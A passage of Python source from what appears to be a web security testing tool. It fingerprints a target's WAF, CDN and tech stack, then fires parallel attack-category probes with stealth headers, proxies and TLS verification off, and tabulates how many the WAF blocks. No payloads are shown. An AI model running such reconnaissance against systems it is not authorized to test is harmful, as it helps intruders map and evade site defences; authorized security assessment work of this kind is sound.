        ansi_esc = _re.compile(r'\x1b\[[0-9;]*[A-Za-z]')
        output_clean = ansi_esc.sub('', output)
        result["raw"] = output_clean[:1500]

        for line in output_clean.splitlines():
            # Matches: "is behind Azure Front Door (Microsoft) WAF."
            m = _re.search(r'is behind (.+?)\s+WAF', line, _re.IGNORECASE)
            if m:
                waf_name = m.group(1).strip().rstrip('.')
                if waf_name and waf_name not in result["waf_names"]:
                    result["waf_names"].append(waf_name)
                    result["detected"] = True

        if "no waf detected" in output_clean.lower():
            result["detected"] = False
            result["waf_names"] = []

    except subprocess.TimeoutExpired:
        result["error"] = f"timed out ({timeout}s)"
    except Exception as e:
        result["error"] = str(e)

    return result


# ─── Main entry point ─────────────────────────────────────────────────────────

def run(target_url: str, timeout: int = 10, logger: Optional[logging.Logger] = None) -> dict:
    result: dict = {
        "target_alive": False,
        "waf_detected": "Unknown",
        "waf_match_reason": "",
        "waf_notes": "",
        "blocking_mode": "Unknown",
        "cdn_detected": "Unknown",
        "tech_stack": [],
        "rate_limit_headers": {},
        "robots_txt": False,
        "sitemap_xml": False,
        "https_enforced": target_url.startswith("https://"),
        "hsts": False,
        "probe_results": [],
    }

    parsed = urlparse(target_url)
    hostname = parsed.hostname or ""
    proxies = get_proxy_dict()

    log(f"[PREFLIGHT] Resolving DNS: {hostname}", "info", logger)
    try:
        socket.getaddrinfo(hostname, None)
    except socket.gaierror as e:
        log(f"[PREFLIGHT] DNS resolution failed: {e}", "error", logger)
        return result

    log(f"[PREFLIGHT] Checking target alive: {target_url}", "info", logger)
    try:
        r = requests.head(
            target_url, timeout=timeout, allow_redirects=True,
            headers=stealth_headers(), proxies=proxies,
        )
        result["target_alive"] = True
        base_headers = dict(r.headers)
    except Exception as e:
        log(f"[PREFLIGHT] Target unreachable: {e}", "error", logger)
        return result

    result["cdn_detected"] = _detect_cdn(base_headers)

    server  = base_headers.get("Server", base_headers.get("server", ""))
    powered = base_headers.get("X-Powered-By", base_headers.get("x-powered-by", ""))
    gen     = base_headers.get("X-Generator", base_headers.get("x-generator", ""))
    for val in (server, powered, gen):
        if val and val not in result["tech_stack"]:
            result["tech_stack"].append(val)

    lower_keys = {k.lower() for k in base_headers}
    if "strict-transport-security" in lower_keys:
        result["hsts"] = True
    for rh in ("X-RateLimit-Limit", "Retry-After", "RateLimit-Limit", "RateLimit-Reset"):
        if rh.lower() in lower_keys:
            result["rate_limit_headers"][rh] = base_headers.get(rh, "")

    for path_check, key in (("/robots.txt", "robots_txt"), ("/sitemap.xml", "sitemap_xml")):
        try:
            cr = requests.get(
                target_url.rstrip("/") + path_check, timeout=timeout,
                headers=stealth_headers(), allow_redirects=True, proxies=proxies,
            )
            result[key] = cr.status_code == 200
        except Exception:
            pass

    # ── wafw00f dedicated fingerprinting ─────────────────────────────────────
    log("[wafw00f] Running dedicated WAF fingerprinter...", "info", logger)
    wafw00f_data = _run_wafw00f(target_url, timeout=min(timeout + 30, 60), logger=logger)
    result["wafw00f"] = wafw00f_data
    if wafw00f_data.get("detected"):
        names = ", ".join(wafw00f_data["waf_names"])
        log(f"  [wafw00f] Detected: {names}", "success", logger)
        console.print(f"  [bold green][wafw00f][/bold green] Detected: [cyan]{names}[/cyan]")
    elif wafw00f_data.get("error"):
        log(f"  [wafw00f] {wafw00f_data['error']}", "warning", logger)
    else:
        console.print("  [dim][wafw00f] No WAF identified by dedicated fingerprinter[/dim]")
    console.print()

    total = len(WAF_PROBES)
    log(f"[PREFLIGHT] Running {total} WAF probe requests ({_PROBE_WORKERS} parallel)...", "info", logger)
    console.print(f"  Firing [bold]{total}[/bold] probes across "
                  f"[bold]{len(set(p['category'] for p in WAF_PROBES))}[/bold] attack categories...\n")

    probe_results: list[dict] = []
    lock = threading.Lock()
    sem  = threading.Semaphore(_PROBE_WORKERS)
    auth = get_basic_auth()

    def _fire(probe: dict) -> None:
        url  = target_url.rstrip("/") + probe["path"]
        hdrs = stealth_headers()
        hdrs.update(probe["headers"])
        with sem:
            try:
                pr = requests.get(
                    url, headers=hdrs, params=probe.get("params", {}),
                    timeout=timeout, allow_redirects=False,
                    proxies=proxies, auth=auth, verify=False,
                )
                entry = {
                    "category":     probe["category"],
                    "probe_name":   probe["name"],
                    "url":          url,
                    "status":       pr.status_code,
                    "blocked":      pr.status_code in BLOCK_CODES,
                    "headers":      dict(pr.headers),
                    "body_snippet": pr.text[:300] if pr.text else "",
                    "error":        None,
                    "timestamp":    now_utc(),
                }
            except Exception as e:
                entry = {
                    "category":     probe["category"],
                    "probe_name":   probe["name"],
                    "url":          url,
                    "status":       0,
                    "blocked":      False,
                    "headers":      {},
                    "body_snippet": "",
                    "error":        str(e),
                    "timestamp":    now_utc(),
                }
        with lock:
            probe_results.append(entry)

    threads = [threading.Thread(target=_fire, args=(p,), daemon=True) for p in WAF_PROBES]
    for t in threads:
        t.start()
    for t in threads:
        t.join()

    result["probe_results"] = probe_results

    # ── Per-category detection rates ──────────────────────────────────────────
    from collections import defaultdict
    by_cat: dict[str, list[dict]] = defaultdict(list)
    for entry in probe_results:
        by_cat[entry["category"]].append(entry)

    category_stats: list[dict] = []
    for cat, entries in by_cat.items():
        total_c   = len(entries)
        blocked_c = sum(1 for e in entries if e["blocked"])
        rate      = round(blocked_c / total_c * 100) if total_c else 0
        category_stats.append({
            "category":       cat,
            "total":          total_c,
            "blocked":        blocked_c,
            "detection_rate": rate,
        })
        log(f"  [{cat}] {blocked_c}/{total_c} blocked ({rate}%)", "info", logger)

    result["category_stats"] = category_stats

    waf, waf_reason = _detect_waf(probe_results)
    result["waf_detected"]     = waf
    result["waf_match_reason"] = waf_reason
    result["waf_notes"]        = WAF_SIGNATURES.get(waf, {}).get("notes", "")
    result["blocking_mode"]    = _detect_blocking_mode(probe_results)

    _print_preflight_summary(result)
    return result


def _print_preflight_summary(r: dict) -> None:
    # ── Fingerprint table ─────────────────────────────────────────────────────
    table = Table(
        title="Pre-Flight Security Fingerprint",
        show_header=True, header_style="bold cyan",
    )
    table.add_column("Property",  style="bold white", width=28)
    table.add_column("Value",     style="white")
    table.add_column("Notes",     style="dim",         width=40)

    alive_str = "[bold green]YES[/bold green]" if r["target_alive"] else "[bold red]NO[/bold red]"
    table.add_row("Target Alive", alive_str, "")

    waf   = r["waf_detected"]
    color = "green" if waf == "None detected" else "cyan"
    reason = f"  ({r['waf_match_reason']})" if r.get("waf_match_reason") else ""
    table.add_row(
        "WAF / Bot Protection",
        f"[{color}]{waf}[/{color}]{reason}",
        r.get("waf_notes", ""),
    )

    wafw00f = r.get("wafw00f", {})
    if wafw00f.get("detected"):
        wafw00f_str = ", ".join(wafw00f["waf_names"])
        table.add_row("wafw00f Fingerprint", f"[bold green]{wafw00f_str}[/bold green]",
                      "Dedicated WAF fingerprinter")
    elif wafw00f.get("error"):
        table.add_row("wafw00f Fingerprint", f"[dim]{wafw00f['error']}[/dim]", "")
    else:
        table.add_row("wafw00f Fingerprint", "[dim]None detected[/dim]",
                      "Dedicated WAF fingerprinter")

    mode  = r["blocking_mode"]
    mcolor = "green" if "ACTIVE" in mode else "red"
    table.add_row("Blocking Mode", f"[{mcolor}]{mode}[/{mcolor}]", "")

    cdn   = r["cdn_detected"]
    ccolor = "cyan" if cdn != "None detected" else "dim"
    table.add_row("CDN", f"[{ccolor}]{cdn}[/{ccolor}]", "")

    table.add_row("Tech Stack",   ", ".join(r["tech_stack"]) or "Unknown", "")
    table.add_row("HTTPS",        "Enforced" if r["https_enforced"] else "Not enforced", "")
    table.add_row("HSTS",         "Present" if r["hsts"] else "Missing", "Add Strict-Transport-Security")
    table.add_row("robots.txt",   "Found" if r["robots_txt"] else "Not found", "")
    table.add_row("sitemap.xml",  "Found" if r["sitemap_xml"] else "Not found", "")
    if r["rate_limit_headers"]:
        table.add_row("Rate-Limit Headers", str(r["rate_limit_headers"]), "")

    console.print(table)
    console.print()

    # ── Per-category WAF detection rate table ─────────────────────────────────
    stats = r.get("category_stats", [])
    if not stats:
        return

    total_probes  = sum(s["total"]   for s in stats)
    total_blocked = sum(s["blocked"] for s in stats)
    overall_rate  = round(total_blocked / total_probes * 100) if total_probes else 0

    cat_table = Table(
        title=f"WAF Detection Rate  ({total_blocked}/{total_probes} probes blocked — overall {overall_rate}%)",
        show_header=True, header_style="bold cyan",
    )
    cat_table.add_column("Attack Category",   style="bold white", width=22)
    cat_table.add_column("Probes", justify="right", width=7)
    cat_table.add_column("Blocked", justify="right", width=8)
    cat_table.add_column("Detection Rate", width=20)
    cat_table.add_column("Verdict", width=16)

    for s in sorted(stats, key=lambda x: x["detection_rate"]):
        rate = s["detection_rate"]
        if rate == 0:
            bar_color, verdict = "red",    "CRITICAL — 0%"
        elif rate < 50:
            bar_color, verdict = "yellow", "WEAK"
        elif rate < 80:
            bar_color, verdict = "yellow", "PARTIAL"
        else:
            bar_color, verdict = "green",  "GOOD"

        filled = round(rate / 10)
        bar    = "█" * filled + "░" * (10 - filled)
        cat_table.add_row(
            s["category"],
            str(s["total"]),
            str(s["blocked"]),
            f"[{bar_color}]{bar}[/{bar_color}] {rate}%",
            f"[{bar_color}]{verdict}[/{bar_color}]",
        )

    console.print(cat_table)
    console.print()
